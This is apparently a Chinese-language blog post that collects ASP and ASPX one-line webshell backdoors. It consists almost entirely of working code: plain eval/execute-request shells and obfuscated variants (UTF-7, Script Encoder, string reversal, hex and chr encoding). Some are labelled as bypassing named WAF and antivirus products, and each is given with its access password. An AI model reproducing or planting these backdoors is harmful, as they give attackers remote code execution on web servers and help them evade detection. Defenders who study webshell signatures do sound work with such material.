一句話木馬：ASP篇

 

 

ASP一句話木馬收集：

 

<%eval request("chopper")%>

<%execute request("chopper")%>

<%execute(request("chopper"))%>

<%ExecuteGlobal request("chopper")%>

<%Eval(Request(chr(35)))%>

<%dy=request("c")%><%Eval(dy)%> 

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 

<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>

<%execute request("c")%><%'<% loop <%:%>

< %'<% loop <%:%><%execute request("a")%>

<script language=vbs runat=server>eval(request("c"))</script> 

<script language=VBScript runat=server>execute request("#")</script> 

<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

UTF-7編碼加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

 

Script Encoder 加密  //密碼c

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>

 

這段代碼將"eval request(/*/z/*/)"逆序成")/*/z/*/(tseuqer lave", 以逃避特征碼查殺, 當腳本被訪問, 其代碼會被動態的解碼還原成原始的一句話后門. 當前90%以上的未知后門和變形后門都是使用此類動態解碼技術

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

 密碼 z

 

可以躲過雷客圖的一句話木馬：

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>

 

<%
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>

<%
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>

 

簡單的aspx免殺

<%@ Page Language="Jscript"%>
<%
var a = Request.Item["M"];
var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是這個地方 其他地方好像不會管
eval(a,b);
Response.Write("Test");
%>

 

 

過狗一句話：

<%
dim play
'
'
''''''''''''''''''
'''''''''
play = request("#")
%>
Error
<%
execute(play)
%>

 

<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>

 

 

參考資料：

一些常見的webshell后門的特征碼  https://zhuanlan.zhihu.com/p/22149072

有關一句話后門的收集與整理         http://book.51cto.com/art/201204/328741.htm

asp執行cmd實例                            http://m.blog.csdn.net/woswod/article/details/63253494

本文由Bypass整理發布。轉載請保留出處。